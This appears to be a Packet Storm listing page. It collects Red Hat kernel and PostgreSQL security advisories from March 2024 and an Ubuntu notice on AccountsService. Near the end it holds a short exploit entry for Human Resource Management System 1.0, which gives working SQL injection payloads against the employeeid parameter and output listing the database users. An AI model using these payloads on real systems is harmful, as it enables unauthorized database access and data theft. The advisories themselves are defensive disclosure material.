Red Hat Security Advisory 2024-1253-03 - An update for kpatch-patch-5_14_0-70_64_1, kpatch-patch-5_14_0-70_70_1, kpatch-patch-5_14_0-70_75_1, kpatch-patch-5_14_0-70_80_1, and kpatch-patch-5_14_0-70_85_1 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include privilege escalation and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1253.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel live patch module security update  
Advisory ID:        RHSA-2024:1253-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1253  
Issue date:         2024-03-12  
Revision:           03  
CVE Names:          CVE-2023-2163  
====================================================================

Summary: 

An update for kpatch-patch-5_14_0-70_64_1, kpatch-patch-5_14_0-70_70_1, kpatch-patch-5_14_0-70_75_1, kpatch-patch-5_14_0-70_80_1, and kpatch-patch-5_14_0-70_85_1 is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: bpf: Incorrect verifier pruning leads to unsafe code paths being incorrectly marked as safe (CVE-2023-2163)

* kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests (CVE-2023-3390)

* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-2163

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2213260  
https://bugzilla.redhat.com/show_bug.cgi?id=2225201  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760  
https://bugzilla.redhat.com/show_bug.cgi?id=2240249  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2255498

Red Hat Security Advisory 2024-1253-03

Red Hat Security Advisory 2024-1251-03 - An update for kpatch-patch-5_14_0-362_13_1, kpatch-patch-5_14_0-362_18_1, and kpatch-patch-5_14_0-362_8_1 is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1251.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: kpatch-patch security updateAdvisory ID:        RHSA-2024:1251-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1251Issue date:         2024-03-12Revision:           03CVE Names:          CVE-2024-0646====================================================================Summary: An update for kpatch-patch-5_14_0-362_13_1, kpatch-patch-5_14_0-362_18_1, and kpatch-patch-5_14_0-362_8_1 is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.Security Fix(es):* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0646References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2253908

Red Hat Security Advisory 2024-1251-03

Red Hat Security Advisory 2024-1250-03 - An update for kernel is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include memory exhaustion, null pointer, out of bounds access, out of bounds write, privilege escalation, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1250.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security and bug fix update  
Advisory ID:        RHSA-2024:1250-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1250  
Issue date:         2024-03-12  
Revision:           03  
CVE Names:          CVE-2022-0480  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

'Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Security Fix(es):

* kernel: use-after-free in smb2_is_status_io_timeout() (CVE-2023-1192)

* kernel: nfp: use-after-free in area_cache_get() (CVE-2022-3545)

* kernel: NULL pointer dereference in can_rcv_filter (CVE-2023-2166)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (CVE-2023-2176)

* kernel: UAF in nftables when nft_set_lookup_global triggered after handling named and anonymous sets in batch requests (CVE-2023-3390)

* kernel: out-of-bounds access in relay_file_read (CVE-2023-3268)

* kernel: vmxnet3: NULL pointer dereference in vmxnet3_rq_cleanup() (CVE-2023-4459)

* hw: Intel: Gather Data Sampling (GDS) side channel vulnerability (CVE-2022-40982,Downfall)

* kernel: net/sched: cls_u32 component reference counter leak if tcf_change_indev() fails (CVE-2023-3609)

* kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)

* kernel: Race Condition leading to UAF in Unix Socket could happen in sk_receive_queue ()

* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (CVE-2023-40283)

* kernel: use after free in unix_stream_sendpage (CVE-2023-4622)

* kernel: bpf: Incorrect verifier pruning leads to unsafe code paths being incorrectly marked as safe (CVE-2023-2163)

* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: use-after-free in IPv4 IGMP (CVE-2023-6932)

* kernel: refcount leak in ctnetlink_create_conntrack() (CVE-2023-7192)

Bug Fix(es):

* kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (JIRA:RHEL-1104)

* [SanityOnly][kernel]BUG: sleeping function called from invalid context at kernel/locking/spinlock_rt.c:35 at: sock_map_update_elem_sys+0x85/0x2a0 (JIRA:RHEL-17572)

* kernel: vmxnet3: NULL pointer dereference in vmxnet3_rq_cleanup() (JIRA:RHEL-18084)

* kernel: NULL pointer dereference in can_rcv_filter (JIRA:RHEL-19463)

* kernel: hw: Intel: Gather Data Sampling (GDS) side channel vulnerability (JIRA:RHEL-8592)

* kernel: A heap out-of-bounds write (JIRA:RHEL-18008)

* kernel: Slab-out-of-bound read in compare_netdev_and_ip (JIRA:RHEL-19356)

* kernel: A flaw leading to a use-after-free in area_cache_get() (JIRA:RHEL-19454)

* kernel: bpf: Incorrect verifier pruning leads to unsafe code paths being incorrectly marked as safe (JIRA:RHEL-8978)

* kernel: use-after-free in smb2_is_status_io_timeout() (JIRA:RHEL-15167)

* kernel: various flaws (JIRA:RHEL-16148)

* kernel: use-after-free in l2cap_sock_release in net/bluetooth/l2cap_sock.c (JIRA:RHEL-19001)

* kernel: refcount leak in ctnetlink_create_conntrack() (JIRA:RHEL-20307)

* RHEL9.0 - s390/qeth: recovery and set offline lose routes and IPv6 addr (JIRA:RHEL-17885)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (JIRA:RHEL-22092)

* dm multipath device suspend deadlocks waiting on a flush request (JIRA:RHEL-19103)

* 5.14.0-70.87.1.el9_0: aarch64 BUG: arch topology borken / the CLS domain not a subset of the MC domain (JIRA:RHEL-22501)

* RHEL-9.0 TEST-17-Setup-struct-perf-event-attr / bz1308907 test failure on Ice Lake (JIRA:RHEL-23085)

* Unbounded memory usage by TCP for receive buffers (JIRA:RHEL-16127)

* kernel: use-after-free in IPv4 IGMP (JIRA:RHEL-21648)

* rbd: don't move requests to the running list on errors (JIRA:RHEL-23861)

* kernel: memcg does not limit the number of POSIX file locks allowing memory exhaustion (CVE-2022-0480)

* kernel: GSM multiplexing race condition leads to privilege escalation (CVE-2023-6546)

* kernel: vmxgfx: NULL pointer dereference in vmw_cmd_dx_define_query (CVE-2022-38096)

* kernel: sched/membarrier: reduce the ability to hammer on sys_membarrier (CVE-2024-26602)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-0480

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2049700  
https://bugzilla.redhat.com/show_bug.cgi?id=2133452  
https://bugzilla.redhat.com/show_bug.cgi?id=2154178  
https://bugzilla.redhat.com/show_bug.cgi?id=2161310  
https://bugzilla.redhat.com/show_bug.cgi?id=2187813  
https://bugzilla.redhat.com/show_bug.cgi?id=2187931  
https://bugzilla.redhat.com/show_bug.cgi?id=2213260  
https://bugzilla.redhat.com/show_bug.cgi?id=2215502  
https://bugzilla.redhat.com/show_bug.cgi?id=2219268  
https://bugzilla.redhat.com/show_bug.cgi?id=2223949  
https://bugzilla.redhat.com/show_bug.cgi?id=2225201  
https://bugzilla.redhat.com/show_bug.cgi?id=2230042  
https://bugzilla.redhat.com/show_bug.cgi?id=2230094  
https://bugzilla.redhat.com/show_bug.cgi?id=2231800  
https://bugzilla.redhat.com/show_bug.cgi?id=2237760  
https://bugzilla.redhat.com/show_bug.cgi?id=2240249  
https://bugzilla.redhat.com/show_bug.cgi?id=2246945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2255283  
https://bugzilla.redhat.com/show_bug.cgi?id=2255498  
https://bugzilla.redhat.com/show_bug.cgi?id=2256279  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1250-03

Red Hat Security Advisory 2024-1249-03 - An update for kernel is now available for Red Hat Enterprise Linux 7. Issues addressed include a use-after-free vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1249.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security and bug fix update  
Advisory ID:        RHSA-2024:1249-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1249  
Issue date:         2024-03-12  
Revision:           03  
CVE Names:          CVE-2022-42896  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* (CVE-2024-26602, ?)

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c (CVE-2022-42896)

* kernel: use-after-free in sch_qfq network scheduler (CVE-2023-4921)

* kernel: IGB driver inadequate buffer size for frames larger than MTU (CVE-2023-45871)

* kernel: fbcon: out-of-sync arrays in fbcon_mode_deleted due to wrong con2fb_map assignment (CVE-2023-38409)

* kernel: nf_tables: use-after-free vulnerability in the nft_verdict_init() function (CVE-2024-1086)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* [rhel-7] INFO: possible circular locking dependency detected: store+0x70/0xe0 kernfs_fop_write+0xe3/0x190 (BZ#2161654)

* qedf: Reading /sys/kernel/debug/qedf/hostX/stop_io_on_error can cause panic (BZ#2224973)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-42896

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2147364  
https://bugzilla.redhat.com/show_bug.cgi?id=2230042  
https://bugzilla.redhat.com/show_bug.cgi?id=2244723  
https://bugzilla.redhat.com/show_bug.cgi?id=2245514  
https://bugzilla.redhat.com/show_bug.cgi?id=2262126  
https://bugzilla.redhat.com/show_bug.cgi?id=2267695

Red Hat Security Advisory 2024-1249-03

Red Hat Security Advisory 2024-1248-03 - An update for kernel is now available for Red Hat Enterprise Linux 9. Issues addressed include null pointer, out of bounds access, out of bounds read, out of bounds write, privilege escalation, and use-after-free vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1248.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: kernel security update  
Advisory ID:        RHSA-2024:1248-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1248  
Issue date:         2024-03-12  
Revision:           03  
CVE Names:          CVE-2023-4244  
====================================================================

Summary: 

An update for kernel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: inactive elements in nft_pipapo_walk (CVE-2023-6817)

* kernel: netfilter: use-after-free in nft_trans_gc_catchall_sync leads to privilege escalation (CVE-2024-0193)

* kernel: ktls overwrites readonly memory pages when using function splice with a ktls socket as destination (CVE-2024-0646)

* kernel: Use-after-free in nft_verdict_dump due to a race between set GC and transaction (CVE-2023-4244)

* kernel: A heap out-of-bounds write when function perf_read_group is called and sibling_list is smaller than its child's sibling_list (CVE-2023-5717)

* kernel: NULL pointer dereference in nvmet_tcp_build_iovec (CVE-2023-6356)

* kernel: NULL pointer dereference in nvmet_tcp_execute_request (CVE-2023-6535)

* kernel: NULL pointer dereference in __nvmet_req_complete (CVE-2023-6536)

* kernel: Out-Of-Bounds Read vulnerability in smbCalcSize (CVE-2023-6606)

* kernel: OOB Access in smb2_dump_detail (CVE-2023-6610)

* kernel: use-after-free in amdgpu_cs_wait_all_fences in drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c (CVE-2023-51042)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-4244

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2235306  
https://bugzilla.redhat.com/show_bug.cgi?id=2246945  
https://bugzilla.redhat.com/show_bug.cgi?id=2253611  
https://bugzilla.redhat.com/show_bug.cgi?id=2253614  
https://bugzilla.redhat.com/show_bug.cgi?id=2253908  
https://bugzilla.redhat.com/show_bug.cgi?id=2254052  
https://bugzilla.redhat.com/show_bug.cgi?id=2254053  
https://bugzilla.redhat.com/show_bug.cgi?id=2254054  
https://bugzilla.redhat.com/show_bug.cgi?id=2255139  
https://bugzilla.redhat.com/show_bug.cgi?id=2255653  
https://bugzilla.redhat.com/show_bug.cgi?id=2259866

Red Hat Security Advisory 2024-1248-03

Red Hat Security Advisory 2024-1244-03 - An update for rhc-worker-script is now available for Red Hat Enterprise Linux 7. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1244.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: rhc-worker-script security updateAdvisory ID:        RHSA-2024:1244-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1244Issue date:         2024-03-11Revision:           03CVE Names:          CVE-2023-39326====================================================================Summary: An update for rhc-worker-script is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The rhc-worker-script packages provide Remote Host Configuration (rhc) worker for executing an interpreted programming language script on hosts managed by Red Hat Insights.Security Fix(es):* golang: net/http/internal: Denial of Service (DoS) via Resource Consumption via HTTP requests (CVE-2023-39326)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-39326References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2253330

Red Hat Security Advisory 2024-1244-03

Red Hat Security Advisory 2024-1241-03 - An update for postgresql is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1241.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql security updateAdvisory ID:        RHSA-2024:1241-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1241Issue date:         2024-03-11Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for postgresql is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1241-03

Red Hat Security Advisory 2024-1240-03 - An update for postgresql is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1240.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: postgresql security updateAdvisory ID:        RHSA-2024:1240-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1240Issue date:         2024-03-11Revision:           03CVE Names:          CVE-2024-0985====================================================================Summary: An update for postgresql is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0985References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2263384

Red Hat Security Advisory 2024-1240-03

Human Resource Management System version 1.0 suffers from a remote SQL injection vulnerability. Original discovery of SQL injection in this version is attributed to Abdulhakim Oner in March of 2023.

    # Exploit Title: Human Resource Management System - SQL Injection# Date: 13-01-2024# Exploit Author: Srikar ( Exp1o1t9r )# Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html# https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip# Version: 1.0 (Monday, October 10, 2022 - 13:37)# Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0# Vulnerable URL and Parameter:URL:Parameter: employeeid=2 The following payloads successfully identified SQL injectionvulnerabilities:employeeid=2' AND 9667=9667-- NFMgemployeeid=2' AND (SELECT6014 FROM(SELECT COUNT(*),CONCAT(0x716a767671,(SELECT(ELT(6014=6014,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ywfiemployeeid=2' AND (SELECT7160 FROM (SELECT(SLEEP([SLEEPTIME])))IzXD)-- ninWemployeeid=-4254' UNIONALL SELECTNULL,CONCAT(0x716a767671,0x457977584e79636568687641497a4b6e637668455a487948534e50737753626f5a4a545244616276,0x7162716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--- *# Response:MySQL: 10.4.32-MariaDBUsers:'pma'@'localhost''root'@'127.0.0.1''root'@'::1''root'@'localhost'*

Human Resource Management System 1.0 SQL Injection

Ubuntu Security Notice 6687-1 - It was discovered that AccountsService called a helper incorrectly when performing password change operations. A local attacker could possibly use this issue to obtain encrypted passwords.

==========================================================================  
Ubuntu Security Notice USN-6687-1  
March 11, 2024

accountsservice vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

AccountsService could be made to expose sensitive information.

Software Description:  
- accountsservice: query and manipulate user account information

Details:

It was discovered that AccountsService called a helper incorrectly when  
performaing password change operations. A local attacker could possibly use  
this issue to obtain encrypted passwords.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   accountsservice                 22.07.5-2ubuntu1.5  
   libaccountsservice0             22.07.5-2ubuntu1.5

Ubuntu 20.04 LTS:  
   accountsservice                 0.6.55-0ubuntu12~20.04.7  
   libaccountsservice0             0.6.55-0ubuntu12~20.04.7

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6687-1  
   CVE-2012-6655

Package Information:  
   https://launchpad.net/ubuntu/+source/accountsservice/22.07.5-2ubuntu1.5  
   https://launchpad.net/ubuntu/+source/accountsservice/0.6.55-0ubuntu12~20.04.7

Source

Packet Storm